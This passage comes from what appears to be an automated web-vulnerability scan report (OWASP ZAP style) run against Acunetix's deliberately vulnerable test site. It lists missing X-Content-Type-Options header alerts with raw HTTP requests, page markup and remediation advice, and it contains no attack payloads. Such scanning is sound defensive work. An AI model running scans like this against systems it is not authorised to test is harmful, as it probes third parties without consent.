href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        27. POST http://testaspnet.vulnweb.com/login.aspx
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (397 bytes)
          POST http://testaspnet.vulnweb.com/login.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/login.aspx
          Content-Length: 1197
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1197 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv%2BQ8XadeewSqHhJbH9z4dvJw%3D%3D&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=%2FwEWWwLoz%2FfGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ8xY%2BHkfERpF5ijDSZsRL1CxlmHEA%3D%3D&tbUsername=ZAP&tbPassword=ZAP&cbPersistCookie=on&btnLogin=Login
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 13281
          
          
          Response body (13281 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>login</title>
          		<meta name="vs_showGrid" content="True">
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="frmLogin" method="post" action="login.aspx" id="frmLogin">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['frmLogin'];
          if (!theForm) {
              theForm = document.frmLogin;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWwLoz/fGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8xY+HkfERpF5ijDSZsRL1CxlmHEA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top" align="center">
          						<TABLE id="Table2" cellSpacing="0" cellPadding="5" border="0" align="center" class="FramedForm">
          							<TR>
          								<TD>Username:</TD>
          								<TD align="right">
          									<input name="tbUsername" type="text" value="ZAP" id="tbUsername" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD>Password:</TD>
          								<TD align="right">
          									<input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD align="left" colSpan="2"><input name="cbPersistCookie" type="checkbox" id="cbPersistCookie" checked="checked" class="classic" />
          									Remember me
          								</TD>
          							</TR>
          							<TR>
          								<TD></TD>
          								<TD align="right">
          									<input type="submit" name="btnLogin" value="Login" id="btnLogin" /></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        28. POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (413 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
          Content-Length: 6543
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (6543 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:21 GMT
          Content-Length: 22723
          
          
          Response body (22723 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=0" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> &ndash; <strong>May 2019</strong> &ndash; Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p>     <p>&ldquo;No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,&rdquo; said Nicolas Sciberras, CTO.</p>     <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p>     <p><strong>More Features in the Latest Build</strong></p>     <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). 
This new build also includes:</p>     <p>- Support for IPv6<br />     - Improved usage of machine resources<br />     - Added support for Selenium scripts as import files<br />     - Multiple vulnerability checks for SAP<br />     - Unauthorized access detection for Redis and Memcached<br />     - Source code disclosure for Ruby and Python</p>     <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p>     <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p>     <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p>     <p><strong>Acunetix, the Company</strong></p>     <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. 
It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
